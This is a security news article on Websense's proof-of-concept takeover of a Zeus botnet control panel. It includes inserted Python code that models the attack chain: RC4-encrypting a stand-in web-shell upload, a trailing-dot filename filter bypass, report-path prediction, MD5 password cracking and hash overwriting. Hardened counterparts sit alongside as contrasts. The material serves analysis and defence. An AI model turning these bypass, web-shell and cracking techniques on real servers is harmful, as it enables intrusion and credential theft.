Zeus Malware Control Panel Vulnerable: Websense

Researchers at Websense revealed details of how to turn the tables on the purveyors of a Zeus Trojan circulating cyberspace by compromising the control panel of the malware’s command and control server (C&C).

As part of their proof-of-concept, Websense set up a command and control server in an internal research network that replicated deployments used by cybercriminals in the wild. According to Websense, Zeus 2.0.8.9 was used in the experiment, but researchers believe the same issue is present in other versions as well. 

Zeus bots, explained Websense researcher Abel Toro, operate in the following way: first, they infect a system; second, they gather credentials and personally identifiable information; and third, they upload the stolen data to the command and control server in the form of reports.

ZeuS Control Panel

“The crucial point here is that the bot uploads some file to the remote server,” he blogged. “What if we could leverage this mechanism to impersonate a bot and upload our own file to the server? Let’s say an executable, with which we could execute commands on the server.”

“Unfortunately,” he continued, “we can’t just simply upload a file. Zeus uses an RC4 algorithm to encrypt all communications between the bot and the server, so it will only accept files if they are encrypted with the same key that the server uses. Luckily for us, RC4 is a symmetric cipher, which means that both parties (in this case the bot and the C&C) use the same pre-shared key. This further implies that the key is embedded somewhere in the bot. So we need to capture a Zeus binary and find the keys in order to be able to communicate with the C&C. We can achieve this by using the Volatility memory analysis tool to dump the RC4 keystream from an infected machine’s memory.”

After obtaining the key, the researchers turned to using it to encrypt the file they wanted to upload, impersonating a bot submitting a report. The command and control server, however, also checks that only valid reports are uploaded.

“We know that the C&C is using .php files, therefore, we will try to upload a php file too, which will be executed on the server side by the PHP interpreter,” he blogged. “But, the server won’t let us upload .php files. However, there is a vulnerability in the C&C’s code and a well-known technique to bypass the checks they are performing on uploaded files.”

One of the most widely used bypass methods, he noted, is to add a period after filename.php (filename.php.).


“The PHP interpreter is quite liberal, and it will interpret it as a valid php file,” he blogged. “With PHP we could execute a number of commands on the server, but in our case, we would like to get access to the control panel, so we will use a PHP web-shell, which will allow us to browse the filesystem, interact with the backend database, and (possibly, depending on the server configuration) execute system commands.”

“Now, we have everything we need to compromise the C&C server: the RC4 key, the file we want to upload (web-shell), and a way to bypass the checks,” he added. “By default, Zeus C&C’s use gate.php to receive the reports, and they will store these reports in C&C’s IP/_reports/files/BOTNET_ID/BOTID/ directory. Since we are impersonating a bot, we control both the BOTNET_ID and BOTID values, so we can predict where our uploaded file will end up. All we have to do after uploading our file is to browse to this location and our code will be executed.”
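The chain above (encrypt the payload with the recovered RC4 key, defeat the upload filter with a trailing dot, and predict the report path from the bot-controlled BOTNET_ID and BOTID) can be modelled end to end. The following is an added example written for this page, not Websense’s code and not the Zeus C&C’s own source: the RC4 routine is the standard algorithm; the “vulnerable” filter is an assumed model of a last-extension blacklist (the article only says the server rejects .php names and that “shell.php.” slips through); the `.php`/`.phtml`/`.php5` list, the `_reports/files/...` layout (taken from the article), the sample IDs and the one-line PHP stand-in for a web shell are all constructed for illustration. The hardened check beside it shows what a correct filter would have done.

```python
import os

def rc4(key: bytes, data: bytes) -> bytes:
    """Textbook RC4 (KSA + PRGA). Because RC4 is symmetric, the same call
    encrypts and decrypts, which is why a key dumped from a bot is enough
    to talk to the C&C in both directions."""
    S = list(range(256))
    j = 0
    for i in range(256):                      # key-scheduling algorithm
        j = (j + S[i] + key[i % len(key)]) & 0xFF
        S[i], S[j] = S[j], S[i]
    out = bytearray()
    i = j = 0
    for byte in data:                         # pseudo-random generation
        i = (i + 1) & 0xFF
        j = (j + S[i]) & 0xFF
        S[i], S[j] = S[j], S[i]
        out.append(byte ^ S[(S[i] + S[j]) & 0xFF])
    return bytes(out)

# Assumed list of server-side executable extensions (illustrative, not from the page).
EXECUTABLE_EXTS = {".php", ".phtml", ".php5"}

def vulnerable_upload_check(filename: str) -> bool:
    """Assumed model of the C&C's filter: compare only the final extension.
    'shell.php.' has the final extension '.', so it is accepted."""
    return os.path.splitext(filename)[1].lower() not in EXECUTABLE_EXTS

def hardened_upload_check(filename: str) -> bool:
    """Normalise first (strip the trailing dots/spaces an interpreter may
    ignore), refuse path separators and dotfiles, then reject if ANY dotted
    segment is an executable extension ('shell.php.', 'shell.jpg.php', ...)."""
    name = filename.rstrip(". ").lower()
    if not name or "/" in name or "\\" in name or name.startswith("."):
        return False
    segments = name.split(".")[1:]
    return not any("." + seg in EXECUTABLE_EXTS for seg in segments)

def predicted_report_path(botnet_id: str, bot_id: str, filename: str) -> str:
    """Report location described in the article; both IDs are supplied by
    the (impersonated) bot, so the attacker knows where the file lands."""
    return f"_reports/files/{botnet_id}/{bot_id}/{filename}"

def craft_upload(key: bytes, botnet_id: str, bot_id: str):
    """Build what the impersonated bot would send: a bypass filename, the
    RC4-encrypted body, and the URL path to request afterwards."""
    payload = b"<?php echo 'shell'; ?>"       # constructed stand-in for a web shell
    filename = "shell.php."                   # trailing-dot bypass from the article
    body = rc4(key, payload)                  # encrypt as a real bot would
    return filename, body, predicted_report_path(botnet_id, bot_id, filename)

if __name__ == "__main__":
    fn, body, path = craft_upload(b"Key", "botnet1", "bot-42")
    print("upload name:", fn, "| naive filter accepts:", vulnerable_upload_check(fn),
          "| hardened filter accepts:", hardened_upload_check(fn))
    print("would execute at:", path)
```

The point of the hardened check is not the specific extension list but the order of operations: normalise the name exactly as the runtime will, and only then decide. Any filter that inspects the raw string while the interpreter inspects a canonicalised one leaves a gap like the one Websense used.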

The shell enabled the researchers to browse files containing important information about the particular Zeus command and control server and to interact with the backend database, Toro blogged.

To gain access to the control panel, the researchers still needed its password, which is stored in the database; in Websense’s test the database itself was password-protected as well. Because the control panel’s PHP code has to interact with the database, however, the database credentials are stored in one of the panel’s configuration files (config.php under the /system/ directory). Once inside the database, the researchers accessed the table that stores information about the control panel user, such as the username and hashed password.

“Zeus stores these passwords using a simple MD5 hash without any salting, thus they are relatively easy to crack,” Toro blogged. “Another option would be – since we have full read/write access to the database – to create our own password, hash it with MD5, and insert that into the database instead of the current password. Now, we will try to crack the password, hoping that it is not a very strong one.”

Once the password was cracked, the researchers had full access to the control panel.
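Both routes Toro describes, cracking the unsalted MD5 and simply writing a hash of one’s own into the user row, are cheap precisely because the hash is unsalted and fast. The following is an added example for this page, not Websense’s or Zeus’s code: the user row, the wordlist and the passwords are constructed; the column names are assumed, not taken from the Zeus schema; and the salted PBKDF2 variant at the end is shown only as the contrast a practitioner would want (iteration count kept low so the example runs quickly).

```python
import hashlib
import hmac
import secrets

def md5_unsalted(password: str) -> str:
    """The storage format described in the article: bare MD5, no salt."""
    return hashlib.md5(password.encode()).hexdigest()

# Constructed stand-in for the panel's user row (column names assumed).
SAMPLE_USER_ROW = {"name": "admin", "password": md5_unsalted("letmein")}

# Constructed mini wordlist; a real run would use a large dictionary.
WORDLIST = ["123456", "admin", "qwerty", "letmein", "password"]

def crack_md5(target_hex: str, wordlist) -> "str | None":
    """Dictionary attack. With no salt, one MD5 per candidate is all it
    costs, and one pass would cover every user in the table."""
    for candidate in wordlist:
        if hmac.compare_digest(md5_unsalted(candidate), target_hex):
            return candidate
    return None

def forge_panel_login(row: dict, new_password: str) -> dict:
    """The second option from the article: with write access to the table,
    overwrite the stored hash with one for a password we choose."""
    forged = dict(row)
    forged["password"] = md5_unsalted(new_password)
    return forged

# Contrast: what a salted, slow hash would have cost the attacker.
PBKDF2_ITERATIONS = 100_000   # kept low for the demo; use far more in production

def hash_password_salted(password: str, salt: bytes = None) -> str:
    salt = salt or secrets.token_bytes(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ITERATIONS)
    return salt.hex() + "$" + dk.hex()

def verify_salted(password: str, stored: str) -> bool:
    salt_hex, dk_hex = stored.split("$")
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(),
                             bytes.fromhex(salt_hex), PBKDF2_ITERATIONS)
    return hmac.compare_digest(dk.hex(), dk_hex)

if __name__ == "__main__":
    print("cracked panel password:", crack_md5(SAMPLE_USER_ROW["password"], WORDLIST))
    print("forged row:", forge_panel_login(SAMPLE_USER_ROW, "attacker-chosen"))
    print("same password, two different salted hashes:",
          hash_password_salted("letmein") != hash_password_salted("letmein"))
```

Note that the salted variant does not stop an attacker who already has write access to the table (the forged-hash route still works); it only removes the cheap offline crack, which is the first of the two options the researchers tried.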

The experiment shows that while Zeus may be regarded as an advanced banking Trojan by some, it is far from perfect, Toro added.

Written By

Marketing professional with a background in journalism and a focus on IT security.
